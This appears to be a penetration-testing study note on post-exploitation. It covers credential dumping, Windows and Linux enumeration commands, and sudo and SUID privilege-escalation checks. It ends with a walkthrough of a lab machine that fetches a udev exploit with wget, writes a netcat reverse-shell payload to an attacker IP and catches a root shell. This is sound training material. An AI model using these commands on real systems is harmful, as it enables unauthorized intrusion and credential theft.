The six steps/stages of a PenTest…

1. Pre-Engagement: Planning & Scope
2. Recon: Information Gathering
3. Scanning
4. Exploitation
5. Post-Exploitation
6. Post-Engagement: Report

Outline of the Post-Exploitation Stage:

1. Pivot
   1. Horizontal Movement: Lateral Moves
   2. Vertical Movement: Privilege Escalation
2. Additional Recon
   1. Identify new targets previously not visible
   2. GOAL: Enumeration (build a list of new, potential targets not previously visible)
      • Users: usernames & passwords (cracking: most common post-exploitation attack)
      • Groups: for lateral movement and/or privilege escalation
      • Forest(s): in Active Directory (AD) environments
      • Sensitive Data: because that's why we are here… right?
      • Unencrypted Files: because they contain information we may be able to leverage
3. Avoid Detection
4. Exfiltration
5. Clean-Up
   • Concealment
   • Retain Access

After you've compromised a system, one of the first things you want to try is acquiring the local credential store (passwords).

Windows: The go-to tool is mimikatz (it can read hashes directly from memory).

Linux: The creddump package contains…

1. cachedump: dumps cashed credentials
2. lsadump: dumps LSA Secrets
3. pwdump: dumps password hashes

Linux passwords are usually found in /etc/shadow.

• You can simply copy that file to your attack machine and crack offline (if you have root).
• Therefore, priv esc is a key part of acquiring credentials.

Once you have gained access to a machine, you need to enumerate (additional recon) to explore opportunities for additional movement (lateral or vertical).

Local Windows enumeration is not as straightforward as Linux. Here are some examples…

## from cmd.exe, regular user: 

# Print OS name and version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

# Display user accounts
net users

# Display info on particular user
net user Guest

# Network interface info: 
ipconfig

# Routing information 
route print

# IP/MAC mapping information
arp -a

# More...
netsh firewall show state  # check firewall state
netsh firewall show config # check firewall settings
tasklist /SVC              # check tasks & services
net start
DRIVEQUERY

# Find low-hanging fruit:
wmic qfe get Caption,Description,HotFixID,InstalledOn

Note: The Windows Management Instrumentation Command line (WMIC) is a software utility that allows users to performs Windows Management Instrumentation (WMI) operations with a command prompt.

Common Attack Vectors:

• SUID/SGID files
• Cron jobs
• The kernel
• Check to see if /etc/passwd and /etc/shadow and readable and/or writable by world.
• Check sudo: sudo -l (if it hangs, it's waiting for a password; kill & reconnect)
• You can also find backup files (.bak; might have login creds in them) and files owned by root but world readable and/or writable.

sudo is the “super user do” command.

• It allows users to escalate their privileges based on settings in the /etc/sudoers file.
• When the sudo command is called, the sudoers file is checked and rights are granted if they are permitted.

Therefore, always review the sudoers file after you gain access to a machine.

• Figure out which accounts you want to target based on the rights they have.
• Try to compromise accounts with sudo privilege.

One of the first commands you want to execute in order to abuse sudoer rights: sudo -l

• This will list (“-l” is for “list”) the sudoers.
• This shows you the user account names and privileges they have within the sudo environment.

SUID: Set User ID. SGID: Set Group ID

• These are special bits of a file that tell Linux to run the executable as the owner (SUID) or as the group (SGID) of the file, not as the user who launched it.

To find all the files on a system that have the SUID bit set:

find / -perm -4000
# or
find / -perm /4000

# To see all the details:
find / -perm -u=s -type f 2>/dev/null
# or
find / -user root -perm -4000 -exec ls -ldb {} \;
# note: you need a space between {} and \;

If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd…

Four local Linux exploits using udevd to escalate privileges to root:

1. Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation
2. Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)
3. Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)
4. Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)

Walk-Through Video described below:

On the target machine, see if udev is running:

ps ax | grep udevd

On the target machine, check the version of udev; run:

dkpg -l | grep udev
# On HTB Lame I got version 117-8

Google the udev version or do a searchsploit udev and see what comes up. The YouTuber referenced above liked the 8572.c exploit. Note: The searchsploit results show a Path that is local in: /usr/share/exploitdb/exploits/…

-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ----------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <  | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4 | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E | linux/local/21848.rb
-------------------------------------------------------- ----------------------

First, spin up a web server on hour Kali box (your attack machine, your machine) so we can move the exploit over onto the target box:

start apache2 service

Copy the exploit file over to the web server subdir:

cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/

Check & Read:

• cd into /var/www/html and make sure your file is there. Open it up with an editor and look at what it needs to run.
• The Usage section of the file (at the top, scroll down) will tell you how to use the exploit.
  • Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
  • The exploit will execute /tmp/run (a text file named “run” that lives in the /tmp directory) as root so throw whatever payload you want in there.

From your shell over on the target, in the /tmp directory, copy the file from your Kali attack machine onto the target machine using wget:

wget 10.10.14.11/8572  # that's the IP of your Kali/attack machine

Build your run file on the target, in the /tmp directory. Remember, the /tmp/run file is being used as the payload for the udev exploit. So… build a text file…

touch run
echo '#!/bin/sh' >> run
echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run

When the udev exploit runs, it will execute netcat with the reverse shell going to my attack machine

You need to compile that .c file you copied to the target machine:

gcc 8572.c -o 8572  # name it whatever you want

Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target:

nc -nvlp 5555  # make sure it's the same port number

Now the listener is waiting for a connection on the Kali attack machine…

Run the udev exploit on the target using the netlink socket PID as argv[1]. This creates a reverse shell back to your Kali attack machine.

./8572 2687

You should have a reverse shell on your Kali machine with root privileges on the target machine. Done.

The LSA Secrets Registry contains the password of the currently logged-in user in an encrypted form.

• You can find the LSA Secrets Registry here: HKEY_LOCAL_MACHINE/Security/Policy/Secrets
• You can find the encryption key to the user's password in the parent directory: HKEY_LOCAL_MACHINE/Security/Policy

So, if you have admin access to the Windows Registry, you can recover the encrypted password and its key fairly easily.